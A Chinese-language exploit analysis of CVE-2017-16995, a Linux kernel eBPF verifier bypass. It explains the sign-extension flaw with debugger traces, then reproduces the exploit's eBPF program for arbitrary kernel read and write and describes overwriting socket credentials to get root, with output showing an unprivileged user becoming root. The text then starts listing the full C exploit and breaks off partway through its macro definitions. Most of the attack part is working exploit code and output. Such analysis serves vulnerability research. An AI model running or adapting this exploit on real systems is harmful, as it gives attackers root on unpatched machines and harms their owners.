# Ubuntu kernel eBPF(CVE-2017-16995) ## 前言 关于这个漏洞网上已经有很多相关原理的分析,但大多主要以[Vitaly Nikolenko](https://twitter.com/vnik5287/status/974277953394651137)的exp来分析,其中涉及了对exp中ebpf字节码进行逆向的问题,对于分析漏洞利用过程并不是十分直观。本篇文章以[Bruce Leidl](https://github.com/brl/grlh/blob/master/get-rekt-linux-hardened.c)的exp进行分析,个人认为相比前者流程更加清晰直观,便于理解。 ## 环境搭建 本次复现使用[Linux_kernel-4.4.33](https://mirrors.edge.kernel.org/pub/linux/kernel/v4.x/linux-4.4.33.tar.gz),在编译前开启CONFIG_BPF 和CONFIG_DEBUG_INFO。 ## extended BPF eBPF(extended Berkeley Packet Filter)是内核源自于BPF的一套包过滤机制,eBPF的功能已经不仅仅局限于网络包过滤,利用它可以实现kernel tracing,tracfic control,应用性能监控等强大功能。eBPF提供了一套类似RISC指令集,并实现了该指令集的虚拟机,使用者通过内核API向eBPF提交指令代码来完成特定的功能。 eBPF虚拟指令系统属于RISC,拥有10个虚拟寄存器,r0-r10,在实际运行时,虚拟机会把这10个寄存器一 一对应于硬件CPU的10个物理寄存器,以x64为例,对应关系如下: //R0 - 保存返回值 //R1-R5 参数传递 //R6-R9 保存临时变量 //R10 只读,用做栈指针 R0 – rax R1 - rdi R2 - rsi R3 - rdx R4 - rcx R5 - r8 R6 - rbx R7 - r13 R8 - r14 R9 - r15 R10 – rbp(帧指针,frame pointer) 每一条指令的格式如下: ```c //source/include/uapi/linux/bpf.h#L58 struct bpf_insn { __u8 code; /* opcode */ __u8 dst_reg:4; /* dest register */ __u8 src_reg:4; /* source register */ __s16 off; /* signed offset */ __s32 imm; /* signed immediate constant */ }; ``` 例如BPF指令:`BPF_MOV32_IMM(BPF_REG_9, 0xFFFFFFFF)`其数据结构为: ```c //source/include/linux/filter.h#L124 #define BPF_MOV32_IMM(DST, IMM) \ ((struct bpf_insn) { \ .code = BPF_ALU | BPF_MOV | BPF_K, \ .dst_reg = DST, \ .src_reg = 0, \ .off = 0, \ .imm = IMM }) ``` 转换成字节码为:`\xb4\x09\x00\x00\xff\xff\xff\xff`。 可通过如下程序对eBPF字节码进行转换: [1]https://github.com/dangokyo/CVE_2017_16995/blob/master/disassembler.c [2]https://github.com/ret2p4nda/kernel-pwn/blob/master/CVE-2017-16995/epbf_tools.py ## 漏洞分析 简单来说漏洞点是在BPF模拟执行检测时的代码实现和实际运行时的代码实现不同,导致了经过构造的BPF指令绕过检测从而执行恶意代码。 ### verifier机制绕过 #### eBPF检测时(do_check() ) 我们首先来看如何绕过eBPF的verifier机制,exp中代码如下: ``` #define BPF_DISABLE_VERIFIER() \ BPF_MOV32_IMM(BPF_REG_2, 0xFFFFFFFF), /* r2 = (u32)0xFFFFFFFF */ \ BPF_JMP_IMM(BPF_JNE, BPF_REG_2, 0xFFFFFFFF, 2), /* if (r2 == -1) { */ \ BPF_MOV64_IMM(BPF_REG_0, 0), /* exit(0); */ \ BPF_EXIT_INSN() /* } */ \ ``` 第一行的eBPF操作码为`BPF_ALU | BPF_MOV | BPF_K`,verifier 会对ALU指令用`check_alu_op`函数进行检查。 该函数调用路径为: ```shell #0 0xffffffff8116719b in check_alu_op (insn=, env=) at kernel/bpf/verifier.c:1097 #1 do_check (env=) at kernel/bpf/verifier.c:1765 #2 bpf_check (prog=, attr=) at kernel/bpf/verifier.c:2258 #3 0xffffffff81163d4e in bpf_prog_load (attr=0xffff88000d94fef0) at kernel/bpf/syscall.c:679 #4 0xffffffff8116456e in SYSC_bpf (size=48, uattr=, cmd=) at kernel/bpf/syscall.c:783 #5 SyS_bpf (cmd=5, uattr=140726845938864, size=72) at kernel/bpf/syscall.c:725 #6 0xffffffff817ef672 in entry_SYSCALL_64 () at arch/x86/entry/entry_64.S:185 ``` 该函数最后一个`else`是将立即数赋值给寄存器,然而其并没有对`BPF_ALU64|BPF_MOV|BPF_K`和`BPF_ALU|BPF_MOV|BPF_K`两个指令做区分。直接把用户指令中的立即数`insn->imm`赋值给了目的寄存器,`insn->imm`和目的寄存器的类型都是int。 ```shell LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ──────────────────────────────────────[ REGISTERS ]──────────────────────────────────────────── RAX 0x90 RBX 0xffff88000d950018 ◂— 0 RCX 0x0 RDX 0xffffffff RDI 0xffff88000d950018 ◂— 0 RSI 0xffff88000d9500a8 ◂— 8 R8 0xa R9 0xfffc R10 0xb R11 0xffffc9000009301b ◂— 0xa /* '\n' */ R12 0x0 R13 0xffffc90000002028 ◂— 0xffffffff000009b4 R14 0xb0 R15 0xffff88000d950000 —▸ 0xffffc90000002000 ◂— 0x2900020001 RBP 0xffff88000d94fe18 —▸ 0xffff88000d94fed0 —▸ 0xffff88000d94ff48 —▸ 0x7ffd85a99d00 —▸ 0x7ffd85a99d10 ◂— ... RSP 0xffff88000d94fd90 ◂— 0xffffffff RIP 0xffffffff8116719b (bpf_check+6715) ◂— 0xca870ffffff237e9 ──────────────────────────────────────[ DISASM ]────────────────────────────────────────────── 0xffffffff81167187 movzx eax, byte ptr [r13 + 1] 0xffffffff8116718c mov edx, dword ptr [r13 + 4] 0xffffffff81167190 and eax, irq_stack_union+15 <15> 0xffffffff81167193 shl rax, 4 <4> 0xffffffff81167197 mov dword ptr [rbx + rax + 8], edx ► 0xffffffff8116719b jmp bpf_check+3191 <0xffffffff811663d7> ↓ 0xffffffff811663d7 add r12d, 1 0xffffffff811663db jmp bpf_check+2633 <0xffffffff811661a9> ↓ 0xffffffff811661a9 cmp dword ptr [rsp + 0x38], r12d 0xffffffff811661ae jle bpf_check+6091 <0xffffffff81166f2b> 0xffffffff811661b4 mov rax, qword ptr [rsp + 0x30] ────────────────────────────────────[ SOURCE (CODE) ]────────────────────────────────────────── In file: /home/ivan/kernel/linux-4.4.33/kernel/bpf/verifier.c 1091 } 1092 } else { 1093 /* case: R = imm 1094 * remember the value we stored into this reg 1095 */ 1096 regs[insn->dst_reg].type = CONST_IMM; ► 1097 regs[insn->dst_reg].imm = insn->imm; 1098 } 1099 1100 } else if (opcode > BPF_END) { 1101 verbose("invalid BPF_ALU opcode %x\n", opcode); ────────────────────────────────────────[ STACK ]────────────────────────────────────────────── 00:0000│ rsp 0xffff88000d94fd90 ◂— 0xffffffff 01:0008│ 0xffff88000d94fd98 ◂— jnp 0xffff88000d94fd3c /* 0xa27b */ 02:0010│ 0xffff88000d94fda0 ◂— 0x95 03:0018│ 0xffff88000d94fda8 ◂— 0 04:0020│ 0xffff88000d94fdb0 ◂— add byte ptr [rax], al /* 0x800000000000 */ 05:0028│ 0xffff88000d94fdb8 —▸ 0x6be540 ◂— 0 06:0030│ 0xffff88000d94fdc0 —▸ 0xffffc90000002028 ◂— 0xffffffff000009b4 07:0038│ 0xffff88000d94fdc8 —▸ 0xffff880000000029 ◂— xlatb /* 0x1ef000d71ef000d7 */ ──────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────── ► f 0 ffffffff8116719b bpf_check+6715 f 1 ffffffff8116719b bpf_check+6715 f 2 ffffffff8116719b bpf_check+6715 f 3 ffffffff81163d4e bpf_prog_load+590 f 4 ffffffff8116456e sys_bpf+846 f 5 ffffffff8116456e sys_bpf+846 f 6 ffffffff817ef672 entry_SYSCALL_64+98 ─────────────────────────────────────────────────────────────────────────────────────────────── pwndbg> x/10wx $rbx+$rax 0xffff88000d9500a8: 0x00000008 0x00000000 0xffffffff 0x00000000 0xffff88000d9500b8: 0x00000006 0x00000000 0x00000000 0x00000000 0xffff88000d9500c8: 0x00000000 0x00000000 ``` `$rbx+$rax`是 `reg_state`结构体类型的`reg`值,可见第一个字段值为8,第二个字段值为0xffffffff。结构体定义如下: ```c //kernel/bpf/verifier.c struct reg_state { enum bpf_reg_type type; union { /* valid when type == CONST_IMM | PTR_TO_STACK */ int imm; /* valid when type == CONST_PTR_TO_MAP | PTR_TO_MAP_VALUE | * PTR_TO_MAP_VALUE_OR_NULL */ struct bpf_map *map_ptr; }; }; //declaration of regs struct reg_state *regs = state->regs ``` 可以看到该结构体有2个字段,第一个为type,代表寄存器数据的类型,此处为`CONST_IMM`,`CONST_IMM`的值为8.另外一个为常量立即数的具体数值,可以看到类型为有符号整形。 `do_check()`在校验条件类跳转指令的时候,会判断条件是否成立,如果是非确定性跳转的话,就说明接下来2个分支都有可能执行(分支1和分支2),这时`do_check()`会把下一步需要跳转到的指令编号(分支2)放到一个临时栈中备用,这样当前指令顺序校验(分支1)过程中遇到`EXIT`指令时,会从临时栈中取出之前保存的下一条指令的序号(分支2)继续校验。**如果跳转指令恒成立的话(即直通分支, fall-through branch ),就不会再往临时栈中放入分支2,因为分支2永远不会执行**。 下面这段代码是对`BPF_JMP|BPF_JNE|BPF_IMM`指令进行检查,这条指令的语义是:如果目的寄存器立即数==指令的立即数(`insn->imm`),程序继续执行,否则执行`pc+off`处的指令;注意判断立即数相等的条件,因为前面ALU指令对32bit和64bit integer不加区分,不论`imm`是否有符号,在这里都是相等的。 ```c //kernel/bpf/verifier.c#L1248 static int check_cond_jmp_op(struct verifier_env *env, struct bpf_insn *insn, int *insn_idx) { struct reg_state *regs = env->cur_state.regs; struct verifier_state *other_branch; u8 opcode = BPF_OP(insn->code); int err; ... /* detect if R == 0 where R was initialized to zero earlier */ if (BPF_SRC(insn->code) == BPF_K && (opcode == BPF_JEQ || opcode == BPF_JNE) && regs[insn->dst_reg].type == CONST_IMM && regs[insn->dst_reg].imm == insn->imm) { if (opcode == BPF_JEQ) { /* if (imm == imm) goto pc+off; * only follow the goto, ignore fall-through */ *insn_idx += insn->off; return 0; } else { /* if (imm != imm) goto pc+off; * only follow fall-through branch, since * that's where the program will go */ return 0; } } other_branch = push_stack(env, *insn_idx + insn->off + 1, *insn_idx); ... } ``` 下面代码,是在校验`EXIT`指令时,会从临时栈中尝试取指令(调用`pop_stack()`函数),如果临时栈中有指令,那就说明还有其他可能执行到的分支,需要继续校验,如果取不到值,表示当前这条`EXIT`指令确实是BPF程序最后一条可以执行到的指令,此时`pop_stack()`会返回-1,然后跳出`do_check`校验循环,`do_check`执行结束,校验通过。 ```c //kernel/bpf/verifier.c#L1921 else if (class == BPF_JMP) { u8 opcode = BPF_OP(insn->code); ... } else if (opcode == BPF_EXIT) { if (BPF_SRC(insn->code) != BPF_K || insn->imm != 0 || insn->src_reg != BPF_REG_0 || insn->dst_reg != BPF_REG_0) { verbose("BPF_EXIT uses reserved fields\n"); return -EINVAL; } /* eBPF calling convetion is such that R0 is used * to return the value from eBPF program. * Make sure that it's readable at this time * of bpf_exit, which means that program wrote * something into it earlier */ err = check_reg_arg(regs, BPF_REG_0, SRC_OP); if (err) return err; if (is_pointer_value(env, BPF_REG_0)) { verbose("R0 leaks addr as return value\n"); return -EACCES; } process_bpf_exit: insn_idx = pop_stack(env, &prev_insn_idx); if (insn_idx < 0) { break; } else { do_print_state = true; continue; } } ... } ``` #### eBPF运行时(_bpf_prog_run() ) 运行第一行操作指令时,将操作码`BPF_ALU | BPF_MOV | BPF_K`对应为`ALU_MOV_K`。而64位的操作码`BPF_ALU64|BPF_MOV|BPF_K`对应为`ALU64_MOV_K`,定义代码如下: ```c //kernel/bpf/core.c static const void *jumptable[256] = { [0 ... 255] = &&default_label, ... [BPF_ALU | BPF_MOV | BPF_K] = &&ALU_MOV_K, ... [BPF_ALU64 | BPF_MOV | BPF_K] = &&ALU64_MOV_K, ... }; ... ALU_MOV_K: DST = (u32) IMM; CONT; ... ALU64_MOV_K: DST = IMM; CONT; ``` 可以看出verifier检测时和eBPF运行时代码对于2条指令的语义解释并不一样,`DST`是64位寄存器,因此`ALU_MOV_K`得到的是一个32位的无符号整数,而`ALU64_MOV_K`会对`imm`进行符号扩展,得到一个64位有符号整数。 eBPF运行时对`BPF_JMP|BPF_JNE|BPF_K`指令的解释 ```c JMP_JNE_K: if (DST != IMM) { insn += insn->off; CONT_JMP; } CONT; ``` 当`imm`为有符号和无符号时,由于符号扩展,`DST!=IMM`结果是不一样的。 动态调试结果如下,可见实际执行时与模拟执行时跳转结果相反,最终执行了verifier未检查的eBPF代码。从而绕过了verifier检测机制。 ```shell LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ──────────────────────────────────────[ REGISTERS ]──────────────────────────────────────────── RAX 0x9 RBX 0xffffc90000002030 ◂— 0xffffffff00020955 RCX 0x0 RDX 0xffffffffffffffff RDI 0xffff88000d961300 ◂— 0 RSI 0xffffffff R8 0x0 R9 0x0 R10 0x0 R11 0xffff88000d929000 ◂— 0 R12 0xffffffff8182e720 (jumptable) —▸ 0xffffffff81162591 (__bpf_prog_run+81) ◂— 0x488182e700c6c748 R13 0x0 R14 0xffff88000d928c00 ◂— 0 R15 0xffff88000d94fdf0 ◂— 0 RBP 0xffff88000d94fce0 —▸ 0xffff88000d94fd20 —▸ 0xffff88000d94fdc0 —▸ 0xffff88000d94fde0 —▸ 0xffff88000d94fe50 ◂— ... RSP 0xffff88000d94fa68 —▸ 0xffffea0000365fc0 ◂— 0x1fffff80000000 RIP 0xffffffff81162d2c (__bpf_prog_run+2028) ◂— 0xfffffd90c5943948 ───────────────────────────────────────[ DISASM ]────────────────────────────────────────────── 0xffffffff811631d0 <__bpf_prog_run+3216> movzx eax, byte ptr [rbx] 0xffffffff811631d3 <__bpf_prog_run+3219> jmp qword ptr [r12 + rax*8] ↓ 0xffffffff81162d21 <__bpf_prog_run+2017> movzx eax, byte ptr [rbx + 1] 0xffffffff81162d25 <__bpf_prog_run+2021> movsxd rdx, dword ptr [rbx + 4] 0xffffffff81162d29 <__bpf_prog_run+2025> and eax, irq_stack_union+15 <15> ► 0xffffffff81162d2c <__bpf_prog_run+2028> cmp qword ptr [rbp + rax*8 - 0x270], rdx 0xffffffff81162d34 <__bpf_prog_run+2036> je __bpf_prog_run+4992 <0xffffffff811638c0> 0xffffffff81162d3a <__bpf_prog_run+2042> movsx rax, word ptr [rbx + 2] 0xffffffff81162d3f <__bpf_prog_run+2047> lea rbx, [rbx + rax*8 + 8] 0xffffffff81162d44 <__bpf_prog_run+2052> movzx eax, byte ptr [rbx] 0xffffffff81162d47 <__bpf_prog_run+2055> jmp qword ptr [r12 + rax*8] ────────────────────────────────────[ SOURCE (CODE) ]────────────────────────────────────────── In file: /home/ivan/kernel/linux-4.4.33/kernel/bpf/core.c 491 insn += insn->off; 492 CONT_JMP; 493 } 494 CONT; 495 JMP_JNE_K: ► 496 if (DST != IMM) { 497 insn += insn->off; 498 CONT_JMP; 499 } 500 CONT; 501 JMP_JGT_X: ────────────────────────────────────────[ STACK ]────────────────────────────────────────────── 00:0000│ rsp 0xffff88000d94fa68 —▸ 0xffffea0000365fc0 ◂— 0x1fffff80000000 01:0008│ 0xffff88000d94fa70 ◂— 0 02:0010│ 0xffff88000d94fa78 —▸ 0xffff88000d961300 ◂— 0 03:0018│ 0xffff88000d94fa80 ◂— 0 04:0020│ 0xffff88000d94fa88 —▸ 0xffff88000fd5c8d8 ◂— 0xffff88000fd5c8d8 05:0028│ 0xffff88000d94fa90 —▸ 0xffff88000fa1a208 —▸ 0xffffea000006f460 —▸ 0xffffea000006f420 —▸ 0xffffea000006f3e0 ◂— ... 06:0030│ 0xffff88000d94fa98 —▸ 0xffff88000fd5c780 ◂— 0x1c4 07:0038│ 0xffff88000d94faa0 —▸ 0xffff88000d94fd20 —▸ 0xffff88000d94fdc0 —▸ 0xffff88000d94fde0 —▸ 0xffff88000d94fe50 ◂— ... ──────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────── ► f 0 ffffffff81162d2c __bpf_prog_run+2028 f 1 ffffffff81700a1b sk_filter+91 f 2 ffffffff81700a1b sk_filter+91 f 3 ffffffff8178d2d5 unix_dgram_sendmsg+501 f 4 ffffffff816cec48 sock_sendmsg+56 f 5 ffffffff816cec48 sock_sendmsg+56 f 6 ffffffff816cece2 sock_write_iter+130 f 7 ffffffff811f7f09 __vfs_write+169 f 8 ffffffff811f7f09 __vfs_write+169 f 9 ffffffff811f8556 vfs_write+150 f 10 ffffffff811f9156 sys_write+70 ─────────────────────────────────────────────────────────────────────────────────────────────── pwndbg> x/wx $rbp+$rax*8-0x270 0xffff88000d94fab8: 0xffffffff pwndbg> i r $rdx rdx 0xffffffffffffffff -1 ``` ### 组装eBPF指令 在绕过verifier检测机制后,需要组装一个eBPF指令用来做任意地址的读写。 首先来看exp中的实现,如下: ```c #define BPF_DISABLE_VERIFIER() \ BPF_MOV32_IMM(BPF_REG_2, 0xFFFFFFFF), /* r2 = (u32)0xFFFFFFFF */ \ BPF_JMP_IMM(BPF_JNE, BPF_REG_2, 0xFFFFFFFF, 2), /* if (r2 == -1) { */ \ BPF_MOV64_IMM(BPF_REG_0, 0), /* exit(0); */ \ BPF_EXIT_INSN() /* } */ \ #define BPF_MAP_GET(idx, dst) \ BPF_MOV64_REG(BPF_REG_1, BPF_REG_9), /* r1 = r9 */ \ BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), /* r2 = fp */ \ BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4), /* r2 = fp - 4 */ \ BPF_ST_MEM(BPF_W, BPF_REG_10, -4, idx), /* *(u32 *)(fp - 4) = idx */ \ BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), \ BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), /* if (r0 == 0) */ \ BPF_EXIT_INSN(), /* exit(0); */ \ BPF_LDX_MEM(BPF_DW, (dst), BPF_REG_0, 0) /* r_dst = *(u64 *)(r0) */ static int load_prog() { struct bpf_insn prog[] = { BPF_DISABLE_VERIFIER(), BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_1, -16), /* *(fp - 16) = r1 */ BPF_LD_MAP_FD(BPF_REG_9, mapfd), /* r9 = mapfd */ //可以看出这个MAP的第一个元素为操作指令,第二个元素为需要读写的内存地址,第三个元素用来存放读取到的内容。 BPF_MAP_GET(0, BPF_REG_6), /* r6 = op */ BPF_MAP_GET(1, BPF_REG_7), /* r7 = address */ BPF_MAP_GET(2, BPF_REG_8), /* r8 = value */ /* store map slot address in r2 */ BPF_MOV64_REG(BPF_REG_2, BPF_REG_0), /* r2 = r0 */ BPF_MOV64_IMM(BPF_REG_0, 0), /* r0 = 0 for exit(0) */ BPF_JMP_IMM(BPF_JNE, BPF_REG_6, 0, 2), /* if (op == 0) */ /* get fp */ BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_10, 0), BPF_EXIT_INSN(), BPF_JMP_IMM(BPF_JNE, BPF_REG_6, 1, 3), /* else if (op == 1) */ /* get skbuff */ BPF_LDX_MEM(BPF_DW, BPF_REG_3, BPF_REG_10, -16), BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_3, 0), BPF_EXIT_INSN(), BPF_JMP_IMM(BPF_JNE, BPF_REG_6, 2, 3), /* else if (op == 2) */ /* read */ BPF_LDX_MEM(BPF_DW, BPF_REG_3, BPF_REG_7, 0), BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_3, 0), BPF_EXIT_INSN(), /* else */ /* write */ BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0), BPF_EXIT_INSN(), }; return bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, prog, sizeof(prog), "GPL", 0); } ``` 之前已经分析过`BPF_DISABLE_VERIFIER()`的行为,继续往下分析。 首先将`rax`存入`rbp - 0x220`处,此处为exp中`fp`的值。将`rdi`存入`rbp-0x268`处,此处为exp中`BPF_REG_1`的值,并且`rdi`在源码中的定义为`struct sk_buff * skb`,这为后面覆写`skb->sk->sk_peer_cred`提权做铺垫。 ```shell LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ──────────────────────────────────────[ REGISTERS ]──────────────────────────────────────────── RAX 0xb4 RBX 0xffffc90000002028 ◂— 0xffffffff000002b4 RCX 0x0 RDX 0xffff88000d9fc800 ◂— 0 RDI 0xffff88000da0e800 ◂— 0 RSI 0xffffc90000002028 ◂— 0xffffffff000002b4 R8 0x0 R9 0x0 R10 0x0 R11 0xffff88000d9fc800 ◂— 0 R12 0xffffffff8182e720 (jumptable) —▸ 0xffffffff81162591 (__bpf_prog_run+81) ◂— 0x488182e700c6c748 R13 0x0 R14 0xffff88000d9fc400 ◂— 0 R15 0xffff88000da0bdf0 ◂— 0 RBP 0xffff88000da0bce0 —▸ 0xffff88000da0bd20 —▸ 0xffff88000da0bdc0 —▸ 0xffff88000da0bde0 —▸ 0xffff88000da0be50 ◂— ... RSP 0xffff88000da0ba68 —▸ 0xffffea0000368a40 ◂— 0x1fffff80000000 RIP 0xffffffff81162577 (__bpf_prog_run+55) ◂— 0xfffffd9085c748 ───────────────────────────────────────[ DISASM ]────────────────────────────────────────────── 0xffffffff8116255c <__bpf_prog_run+28> xor r13d, r13d 0xffffffff8116255f <__bpf_prog_run+31> sub rsp, irq_stack_union+608 <0x260> 0xffffffff81162566 <__bpf_prog_run+38> mov qword ptr [rbp - 0x220], rax 0xffffffff8116256d <__bpf_prog_run+45> movzx eax, byte ptr [rsi] 0xffffffff81162570 <__bpf_prog_run+48> mov qword ptr [rbp - 0x268], rdi ► 0xffffffff81162577 <__bpf_prog_run+55> mov qword ptr [rbp - 0x270], 0 0xffffffff81162582 <__bpf_prog_run+66> mov qword ptr [rbp - 0x238], 0 0xffffffff8116258d <__bpf_prog_run+77> jmp qword ptr [r12 + rax*8] ↓ 0xffffffff811631ba <__bpf_prog_run+3194> movzx eax, byte ptr [rbx + 1] 0xffffffff811631be <__bpf_prog_run+3198> mov esi, dword ptr [rbx + 4] 0xffffffff811631c1 <__bpf_prog_run+3201> add rbx, 8 <8> ────────────────────────────────────[ SOURCE (CODE) ]────────────────────────────────────────── In file: /home/ivan/kernel/linux-4.4.33/kernel/bpf/core.c 305 306 FP = (u64) (unsigned long) &stack[ARRAY_SIZE(stack)]; 307 ARG1 = (u64) (unsigned long) ctx; 308 309 /* Registers used in classic BPF programs need to be reset first. */ ► 310 regs[BPF_REG_A] = 0; 311 regs[BPF_REG_X] = 0; 312 313 select_insn: 314 goto *jumptable[insn->code]; 315 ────────────────────────────────────────[ STACK ]────────────────────────────────────────────── 00:0000│ rsp 0xffff88000da0ba68 —▸ 0xffffea0000368a40 ◂— 0x1fffff80000000 01:0008│ 0xffff88000da0ba70 ◂— 0 02:0010│ 0xffff88000da0ba78 —▸ 0xffff88000da0e800 ◂— 0 03:0018│ 0xffff88000da0ba80 —▸ 0xffff88000d96c770 ◂— 0 04:0020│ 0xffff88000da0ba88 —▸ 0xffff88000da0e800 ◂— 0 05:0028│ 0xffff88000da0ba90 ◂— 0x158 06:0030│ 0xffff88000da0ba98 —▸ 0xffff88000fd07e00 —▸ 0xffff88000fd06780 ◂— 0x1c4 07:0038│ 0xffff88000da0baa0 ◂— 1 ──────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────── ► f 0 ffffffff81162577 __bpf_prog_run+55 f 1 ffffffff81700a1b sk_filter+91 f 2 ffffffff81700a1b sk_filter+91 f 3 ffffffff8178d2d5 unix_dgram_sendmsg+501 f 4 ffffffff816cec48 sock_sendmsg+56 f 5 ffffffff816cec48 sock_sendmsg+56 f 6 ffffffff816cece2 sock_write_iter+130 f 7 ffffffff811f7f09 __vfs_write+169 f 8 ffffffff811f7f09 __vfs_write+169 f 9 ffffffff811f8556 vfs_write+150 f 10 ffffffff811f9156 sys_write+70 ─────────────────────────────────────────────────────────────────────────────────────────────── pwndbg> x/gx $rbp-0x220 0xffff88000da0bac0: 0xffff88000da0bcc8 pwndbg> x/gx 0xffff88000da0bcc8 0xffff88000da0bcc8: 0xffff88000da0e800 pwndbg> x/gx $rbp-0x268 0xffff88000da0ba78: 0xffff88000da0e800 ``` `BPF_MAP_GET`的主要流程为:将`mapfd`放到`r9`;将`r9`放到`r1`,作为后续调用`BPF_FUNC_map_lookup_elem`函数的第一个参数;将`fp`赋值给`r2`;在栈上开辟4个字节的空间;将MAP元素的序号(`idx`)放到`r2`;取map中第r2个元素的值调用`BPF_FUNC_map_lookup_elem`并把返回值存入r0;判断`BPF_FUNC_map_lookup_elem`是否执行成功;成功后执行第9条指令,将取到的值放到目标寄存器(`dst`)中。 后面定义了四个命令:1.获取`fp`内核栈地址。2.获取`sk_buff`地址。3.任意地址读。4.任意地址写。 ### 提权 覆写`sk`中的`sk_peer_cred`使其内部与uid相关值置0。由于每个内核版本`sk_peer_cred`偏移不同,可以先搜索`sk_rcvtimeo = 9223372036854775807`找到其偏移再减8即为`sk_peer_cred`的偏移。 ```shell pwndbg> p *((struct sk_buff *)0xffff88000da0e800) $1 = { { { next = 0x0 , prev = 0x0 , { tstamp = { tv64 = 0 }, skb_mstamp = { { v64 = 0, { stamp_us = 0, stamp_jiffies = 0 } } } } }, rbnode = { __rb_parent_color = 0, rb_right = 0x0 , rb_left = 0x0 } }, sk = 0xffff88000d9fc400, ... } pwndbg> p *((struct sock*)0xffff88000d9fc400) $2 = { ... sk_peer_pid = 0xffff88000d96cd00, sk_peer_cred = 0xffff88000d9f9c00, sk_rcvtimeo = 9223372036854775807, sk_sndtimeo = 9223372036854775807, ... } ``` 运行结果: ```shell / $ id uid=1000(ctf) gid=1000(ctf) groups=1000(ctf) / $ ./get-rekt-linux-hardened [.] [.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t) [.] [.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel ** [.] [*] creating bpf map [*] sneaking evil bpf past the verifier [*] creating socketpair() [*] attaching bpf backdoor to socket uid:3e8 [*] Leaking skbuff addr from ffff88000d9f9400 [*] Leaking sock struct from ffff88000da16400 [*] found sock->sk_rcvtimeo at offset 472 [*] found sock->sk_peer_cred [*] hammering cred structure at ffff88000da10780 [*] credentials patched, launching shell... / # id uid=0(root) gid=0(root) groups=1000(ctf) ``` ## EXP 完整exp如下: ```c #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include char buffer[64]; int sockets[2]; int mapfd, progfd; int doredact = 0; #define LOG_BUF_SIZE 65536 char bpf_log_buf[LOG_BUF_SIZE]; static __u64 ptr_to_u64(void *ptr) { return (__u64) (unsigned long) ptr; } int bpf_prog_load(enum bpf_prog_type prog_type, const struct bpf_insn *insns, int prog_len, const char *license, int kern_version) { union bpf_attr attr = { .prog_type = prog_type, .insns = ptr_to_u64((void *) insns), .insn_cnt = prog_len / sizeof(struct bpf_insn), .license = ptr_to_u64((void *) license), .log_buf = ptr_to_u64(bpf_log_buf), .log_size = LOG_BUF_SIZE, .log_level = 1, }; attr.kern_version = kern_version; bpf_log_buf[0] = 0; return syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr)); } int bpf_create_map(enum bpf_map_type map_type, int key_size, int value_size, int max_entries, int map_flags) { union bpf_attr attr = { .map_type = map_type, .key_size = key_size, .value_size = value_size, .max_entries = max_entries }; return syscall(__NR_bpf, BPF_MAP_CREATE, &attr, sizeof(attr)); } int bpf_update_elem(int fd, void *key, void *value, unsigned long long flags) { union bpf_attr attr = { .map_fd = fd, .key = ptr_to_u64(key), .value = ptr_to_u64(value), .flags = flags, }; return syscall(__NR_bpf, BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr)); } int bpf_lookup_elem(int fd, void *key, void *value) { union bpf_attr attr = { .map_fd = fd, .key = ptr_to_u64(key), .value = ptr_to_u64(value), }; return syscall(__NR_bpf, BPF_MAP_LOOKUP_ELEM, &attr, sizeof(attr)); } #define BPF_ALU64_IMM(OP, DST, IMM) \ ((struct bpf_insn) { \ .code = BPF_ALU64 | BPF_OP(OP) | BPF_K, \ .dst_reg = DST, \ .src_reg = 0, \ .off = 0, \ .imm = IMM }) #define BPF_MOV64_REG(DST, SRC) \ ((struct bpf_insn) { \ .code = BPF_ALU64 | BPF_MOV | BPF_X, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = 0, \ .imm = 0 }) #define BPF_MOV32_REG(DST, SRC) \ ((struct bpf_insn) { \ .code = BPF_ALU | BPF_MOV | BPF_X, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = 0, \ .imm = 0 }) #define BPF_MOV64_IMM(DST, IMM) \ ((struct bpf_insn) { \ .code = BPF_ALU64 | BPF_MOV | BPF_K, \ .dst_reg = DST, \ .src_reg = 0, \ .off = 0, \ .imm = IMM }) #define BPF_MOV32_IMM(DST, IMM) \ ((struct bpf_insn) { \ .code = BPF_ALU | BPF_MOV | BPF_K, \ .dst_reg = DST, \ .src_reg = 0, \ .off = 0, \ .imm = IMM }) #define BPF_LD_IMM64(DST, IMM) \ BPF_LD_IMM64_RAW(DST, 0, IMM) #define BPF_LD_IMM64_RAW(DST, SRC, IMM) \ ((struct bpf_insn) { \ .code = BPF_LD | BPF_DW | BPF_IMM, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = 0, \ .imm = (__u32) (IMM) }), \ ((struct bpf_insn) { \ .code = 0, \ .dst_reg = 0, \ .src_reg = 0, \ .off = 0, \ .imm = ((__u64) (IMM)) >> 32 }) #ifndef BPF_PSEUDO_MAP_FD # define BPF_PSEUDO_MAP_FD 1 #endif #define BPF_LD_MAP_FD(DST, MAP_FD) \ BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD) #define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \ ((struct bpf_insn) { \ .code = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = OFF, \ .imm = 0 }) #define BPF_STX_MEM(SIZE, DST, SRC, OFF) \ ((struct bpf_insn) { \ .code = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM, \ 